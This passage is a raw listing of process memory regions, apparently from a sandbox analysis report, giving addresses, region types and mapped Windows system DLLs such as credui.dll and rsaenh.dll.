region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 37527 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37528 start_va = 0x74be0000 end_va = 0x74bfdfff entry_point = 0x74be0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 37529 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37530 start_va = 0x74bc0000 end_va = 0x74bd1fff entry_point = 0x74bc0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 37531 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 37532 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37535 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37536 start_va = 0x850000 end_va = 0xb1efff entry_point = 0x850000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37537 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 37538 start_va = 0x6a0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = 
"" Region: id = 37539 start_va = 0x748f0000 end_va = 0x74a7ffff entry_point = 0x748f0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 37540 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 37541 start_va = 0x74830000 end_va = 0x748e1fff entry_point = 0x74830000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 37543 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 37544 start_va = 0x270000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37545 start_va = 0x74800000 end_va = 0x7482efff entry_point = 0x74800000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 37546 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 37547 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 37548 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37549 start_va = 0x4a0000 end_va = 0x4a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 37550 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 37551 start_va = 0xb20000 end_va = 0xf12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 37552 start_va = 0x747c0000 end_va = 0x747f7fff entry_point = 0x747c0000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 37554 start_va = 0x4c0000 end_va = 0x4c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 37555 start_va = 0x747b0000 end_va = 0x747b8fff entry_point = 0x747b0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 37556 start_va = 0x560000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 37557 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37558 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37559 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37560 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37561 start_va = 0x74750000 end_va = 0x74762fff entry_point = 0x74750000 
region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 37562 start_va = 0x730000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 37563 start_va = 0x74720000 end_va = 0x7474efff entry_point = 0x74720000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 37564 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 37565 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 37566 start_va = 0x500000 end_va = 0x500fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 37567 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 37568 start_va = 0x6b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 37569 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 37570 start_va = 0x6d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 37571 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 37572 start_va = 0x7b0000 end_va = 0x7b0fff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 37573 start_va = 0x7c0000 end_va = 0x7c0fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id 
= 37574 start_va = 0x7d0000 end_va = 0x7d0fff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 37575 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 37576 start_va = 0x830000 end_va = 0x830fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 37577 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 37578 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 37579 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 37580 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 37581 start_va = 0xf60000 end_va = 0xf60fff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 37582 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 37583 start_va = 0xf80000 end_va = 0xf80fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 37584 start_va = 0xf90000 end_va = 0xf90fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 37585 start_va = 0xfa0000 end_va = 0xfa0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 37586 start_va = 0xfb0000 end_va = 0xfb0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 37587 start_va = 0xfc0000 end_va = 0xfc0fff entry_point = 0x0 region_type = private 
name = "private_0x0000000000fc0000" filename = "" Region: id = 37588 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 37589 start_va = 0xfe0000 end_va = 0xfe0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 37590 start_va = 0xff0000 end_va = 0xff0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 37591 start_va = 0x1000000 end_va = 0x1000fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 37592 start_va = 0x1010000 end_va = 0x1010fff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 37593 start_va = 0x1020000 end_va = 0x1020fff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 37594 start_va = 0x1030000 end_va = 0x1030fff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 37595 start_va = 0x1040000 end_va = 0x1040fff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 37596 start_va = 0x1050000 end_va = 0x1050fff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 37597 start_va = 0x1060000 end_va = 0x1060fff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 37598 start_va = 0x1070000 end_va = 0x1070fff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 37599 start_va = 0x1080000 end_va = 0x1080fff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 37600 start_va = 0x1090000 end_va = 0x1096fff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 37601 
start_va = 0x10a0000 end_va = 0x10a9fff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 37602 start_va = 0x10b0000 end_va = 0x10b6fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 37603 start_va = 0x10c0000 end_va = 0x10e3fff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 37604 start_va = 0x10f0000 end_va = 0x10f9fff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 37605 start_va = 0x1100000 end_va = 0x1106fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 37606 start_va = 0x1130000 end_va = 0x1167fff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 37607 start_va = 0x1110000 end_va = 0x1119fff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 37608 start_va = 0x1120000 end_va = 0x1126fff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 37609 start_va = 0x1170000 end_va = 0x1179fff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 37610 start_va = 0x1180000 end_va = 0x1180fff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 37611 start_va = 0x1190000 end_va = 0x1190fff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 37612 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 37613 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 37614 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 
region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 37615 start_va = 0x11d0000 end_va = 0x11d1fff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 37616 start_va = 0x11e0000 end_va = 0x11e0fff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 37617 start_va = 0x11f0000 end_va = 0x11f1fff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 37618 start_va = 0x1200000 end_va = 0x1200fff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 37619 start_va = 0x1210000 end_va = 0x1211fff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 37620 start_va = 0x1220000 end_va = 0x1220fff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 37621 start_va = 0x1230000 end_va = 0x1231fff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 37622 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 37623 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 37624 start_va = 0x1260000 end_va = 0x1260fff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 37625 start_va = 0x1270000 end_va = 0x1270fff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 37626 start_va = 0x1280000 end_va = 0x1280fff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 37627 start_va = 0x1290000 end_va = 0x1290fff entry_point = 0x0 region_type = private name = "private_0x0000000001290000" 
filename = "" Region: id = 37628 start_va = 0x12a0000 end_va = 0x12a0fff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 37629 start_va = 0x12b0000 end_va = 0x12b0fff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 37630 start_va = 0x12c0000 end_va = 0x12c0fff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 37631 start_va = 0x12d0000 end_va = 0x12d0fff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 37632 start_va = 0x12e0000 end_va = 0x12e0fff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 37633 start_va = 0x12f0000 end_va = 0x12f0fff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 37634 start_va = 0x1300000 end_va = 0x1300fff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 37635 start_va = 0x1310000 end_va = 0x1310fff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 37636 start_va = 0x1320000 end_va = 0x1320fff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 37637 start_va = 0x1330000 end_va = 0x1330fff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 37638 start_va = 0x1340000 end_va = 0x1340fff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 37639 start_va = 0x1350000 end_va = 0x1350fff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 37640 start_va = 0x1360000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 37641 start_va = 0x1460000 end_va = 
0x27b4fff entry_point = 0x1460000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 37642 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 37643 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 37644 start_va = 0x27c0000 end_va = 0x27c0fff entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 37645 start_va = 0x27d0000 end_va = 0x2cc1fff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 37646 start_va = 0x2cd0000 end_va = 0x31c1fff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 37647 start_va = 0x31d0000 end_va = 0x32cffff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 37648 start_va = 0x32d0000 end_va = 0x32d1fff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 37649 start_va = 0x2cd0000 end_va = 0x31c1fff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 37650 start_va = 0x32e0000 end_va = 0x37d1fff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 37651 start_va = 0x37e0000 end_va = 0x3cd1fff entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 37652 start_va = 0x74610000 end_va = 0x74616fff entry_point = 0x74610000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 37653 start_va = 0x27d0000 end_va = 0x2897fff entry_point = 0x27d0000 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 37654 start_va = 0x27d0000 end_va = 0x2897fff entry_point = 0x27d0000 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 37655 start_va = 0x28a0000 end_va = 0x28b1fff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 37656 start_va = 0x27d0000 end_va = 0x27e1fff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 37657 start_va = 0x2830000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 37658 start_va = 0x2960000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 37659 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37660 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37661 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 37662 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 37663 start_va = 0x745e0000 end_va = 0x745f3fff entry_point = 0x745e0000 region_type = mapped_file 
name = "vaultcredprovider.dll" filename = "\\Windows\\System32\\VaultCredProvider.dll" (normalized: "c:\\windows\\system32\\vaultcredprovider.dll") Region: id = 37664 start_va = 0x745b0000 end_va = 0x745d6fff entry_point = 0x745b0000 region_type = mapped_file name = "smartcardcredentialprovider.dll" filename = "\\Windows\\System32\\SmartcardCredentialProvider.dll" (normalized: "c:\\windows\\system32\\smartcardcredentialprovider.dll") Region: id = 37666 start_va = 0x27f0000 end_va = 0x27f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 37667 start_va = 0x2870000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 37668 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37669 start_va = 0x74580000 end_va = 0x745acfff entry_point = 0x74580000 region_type = mapped_file name = "biocredprov.dll" filename = "\\Windows\\System32\\BioCredProv.dll" (normalized: "c:\\windows\\system32\\biocredprov.dll") Region: id = 37671 start_va = 0x2800000 end_va = 0x2801fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 37672 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37673 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37674 start_va = 0x74560000 end_va = 0x74570fff entry_point = 0x74560000 region_type = mapped_file name = "winbio.dll" filename = 
"\\Windows\\System32\\winbio.dll" (normalized: "c:\\windows\\system32\\winbio.dll") Region: id = 37675 start_va = 0x74530000 end_va = 0x7455afff entry_point = 0x74530000 region_type = mapped_file name = "credui.dll" filename = "\\Windows\\System32\\credui.dll" (normalized: "c:\\windows\\system32\\credui.dll") Region: id = 37676 start_va = 0x74520000 end_va = 0x7452bfff entry_point = 0x74520000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 37677 start_va = 0x74500000 end_va = 0x74510fff entry_point = 0x74500000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 37678 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 37679 start_va = 0x753c0000 end_va = 0x753d8fff entry_point = 0x753c0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 37680 start_va = 0x744e0000 end_va = 0x744eefff entry_point = 0x744e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 37681 start_va = 0x744d0000 end_va = 0x744defff entry_point = 0x744d0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 37683 start_va = 0x2810000 end_va = 0x2811fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 37684 start_va = 0x2820000 end_va = 0x282ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" 
filename = "" Region: id = 37685 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37686 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37687 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37688 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37689 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37690 start_va = 0x744a0000 end_va = 0x744c0fff entry_point = 0x744a0000 region_type = mapped_file name = "certcredprovider.dll" filename = "\\Windows\\System32\\certCredProvider.dll" (normalized: "c:\\windows\\system32\\certcredprovider.dll") Region: id = 37691 start_va = 0x74430000 end_va = 0x74491fff entry_point = 0x74430000 region_type = mapped_file name = "rasplap.dll" filename = "\\Windows\\System32\\rasplap.dll" (normalized: "c:\\windows\\system32\\rasplap.dll") Region: id = 37693 start_va = 0x743d0000 end_va = 0x74421fff entry_point = 0x743d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 37694 start_va = 0x743b0000 end_va = 0x743c4fff entry_point = 0x743b0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 37695 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37696 start_va = 0x770f0000 end_va = 0x770f5fff 
entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37697 start_va = 0x743a0000 end_va = 0x743acfff entry_point = 0x743a0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 37706 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37707 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37708 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37709 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37710 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37711 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37712 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37715 start_va = 
0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37716 start_va = 0x2920000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 37717 start_va = 0x2980000 end_va = 0x29bffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 37718 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37719 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37720 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37721 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37722 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37723 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37724 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = 